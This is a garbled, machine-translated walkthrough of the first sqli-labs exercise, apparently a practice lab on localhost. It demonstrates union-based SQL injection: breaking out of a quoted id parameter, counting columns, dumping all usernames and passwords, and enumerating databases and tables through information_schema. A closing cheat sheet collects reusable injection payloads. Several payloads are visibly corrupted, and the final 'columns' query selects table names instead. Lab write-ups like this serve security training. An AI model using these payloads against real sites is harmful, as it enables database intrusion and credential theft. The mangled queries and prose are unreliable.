Sqli-lab First quote error based single quotes

First meeting

1. Initial knowledge

http://localhost/Less-1/

Prompt for ID, so access http://localhost/Less-1/?id=1

Can continue to test the situation of id=2.3.4, etc., will output a different user name and password

2. Further information

Each time will have a different account password out, of course, certainly not such a simple visit.

Since the title says there is a single quote error, try http://localhost/Less-1/?id=%27.

There's nothing wrong with the error, stating that the single quotation marks are counted into the SQL statement

Let's say that this SQL statement is constructed like this:

$sql = "SELECT * from USER WHERE ' id ' = ' $_get[" id "] ' LIMIT 0, 1;

If our assumptions are true, then just complete the single quotation mark, and then you can add your own search criteria later, and try.

Returning only one piece of data is irritating, and may only show the first data of the query results.

Try the perpetual, 1=1, ' 1 ' = ' 1 '.

The key step is to close the enclosed single quotes and add our own statements later, commenting out the useless statements.

For comments We use

1. The encoded # is%23, because # is anchored in HTML meaning, can be understood as a label, so does not automatically encode, need to manually code

2.--and spaces, but spaces are masked in URLs, so use + instead, which is--+ or--%20

Second, move a little mind

1. We want to remove multiple usernames and passwords at once

So construct http://localhost/Less-1/?id=1 ' or id=2--+

But we found that only one user name was returned, so we guessed that this would only return the first of all the results that were searched (later by looking at the source code to know, really)

Then we think that if the first result data is empty, then it is not possible to return the second data we want.

So construct http://localhost/Less-1/?id=-1 ' or id=2--+

The second data is indeed returned.

How do I see how many columns are in this user table? Do not know the column name.

We sort by sort, according to a column, if the error description does not have this column

Http://localhost/Less-1//?id=1 ' ORDER by 4%23

Error when sorting by fourth column, so only three columns

You can see that only the results of columns 2nd and 3rd are displayed on the page, we only have 2, 3 can be used, then we use 2, the information of the database to query

But we need to get multiple usernames and passwords at once, so long as we use the GROUP_CONCAT function, which returns a string result that is combined by the values in the grouping.

This means that if you return only one string at a time, we can use this function to combine a number of results into a single string output

Constructs the Http://localhost/Less-1/?id=-1 ' Union select 1,group_concat (char (32), Username,char (+)), Group_concat (char (), Password,char (+)) from the Users--+

Successfully returns all user names and passwords at once.

3. A little too curious

We are still not satisfied, we also want to know this database name, user name, database version information, how to do?

Concat_ws (): N fields are taken from the database and then grouped together to display with a symbol, the delimiter between the remaining parameters of the first parameter

CHAR (): Converts a decimal ASCII code into a character

User (): Returns the users who are using the current database connection

Database (): Returns the databases used by the current database connection

Version (): Returns the versions of the current database

Although not very SQL statements, but look at his list of several important functions, the general meaning is there, it seems to want to use the CONCAT_WS () function to remove multiple data and then merge into a single data out to crack the limit of the number of outgoing data. Important data to get is database user name, database name, database version ...

Build http://localhost/Less-1/?id=-1 ' Union Select, (Concat_ws (char (32,58,32), User (), database (), version ())%23

Some basic information about the database comes out, user root, database name security.

Three, do not know shame, actually want to see through all?

Are we satisfied?

Not satisfied!!

We want to know all the information, all the library names, table names, column names, etc...

Let's learn first.

first of all, the MySQL Database Information_schema , he is the system database, the installation is complete, the record is the current database database, tables, columns, user rights and other information, the following is a few commonly used tables:

schemata Table : Stores basic information about all MySQL databases, including database name, encoding type path and so on, the results of show databases are taken from this table.

TABLES Table : stored in MySQL Table Information , (of course, there is a column of database name, so as to find which database is the table) including whether the table is a basic table or a system table, the database engine is what, the table has how many rows, the creation time, the last update time and so on. Show tables from SchemaName results from this table

COLUMNS Table : Provides a column information in the table , (and of course the database name and table name columns) Detail all the columns of a table and the information for each column, including the column that is the number of columns in that table, the data type of the column, the encoding type of the column, the permissions of the column, the column's comments, and so on. This table is the result of show columns from Schemaname.tablename.

We want to know all the information, we need to start with this information, step by step strip ... Pants off ... Library...

Then use union to get a variety of information.

Can be obtained by using limit.

Http://localhost/Less-1/?id=-1 ' Union select 1,2,table_name from Information_schema.tables where table_schema= 0x7365637572697479 LIMIT 3,3%23

Note that when querying the information in Information_schema, use the WHERE statement, the value can not be directly in English, to be wrapped in single quotation marks, of course, with its hexadecimal representation can also, the numeric type of the single quotation marks, which should be a guide to filter single quotation marks.

The 16 binary conversion for security is: 0x7365637572697479

16 Binary conversion Address: http://www.bejson.com/convert/ox2str/

Well, you've learned Union and Group_concat (), try it.

Http://localhost/Less-1/?id=-1 ' Union Select 1,2,group_concat (char (+), Table_name,char (+)) from Information_ Schema.tables%23

What's all this back?

Plus a where filter

Http://localhost/Less-1/?id=-1 ' Union Select 1,2,group_concat (char (+), Table_name,char (+)) from Information_ Schema.tables where table_schema=0x7365637572697479%23

The table names come out, so let's see what's on each side.

Add:

URL character escapes

Replace it with other characters, or use the full-width.

+ the + sign in the URL indicates a space%2b

Spaces in a space URL can be encoded with the + number or%20

/delimited directories and subdirectories%2f

? Separating the actual URLs and parameters%3f

% Specifies special characters%25

# indicates bookmark%23

& the delimiter between the parameters specified in the URL%26

= The value of the specified parameter in the URL%3d

Summarize

Write some common SQL statements that query important data in advance

1. Query user name, database name, database version information:

Union Select, (Concat_ws (char (32,58,32), User (), database (), version ())%23

2. Query the names of all the tables in a library

Union Select Group_concat (char (+), Table_name,char (+)) from Information_schema.tables where table_schema= 0x7365637572697479%23

Attention. Check things in the system's own table, where the value should be either single-quote or 16-encoded, usually 16-binary

3. Query the names of all the columns in a table

Union Select Group_concat (char (+), Table_name,char (+)) from INFORMATION_SCHEMA. COLUMNS where table_schema=0x7365637572697479%23

Sqli-lab First quote error based single quotes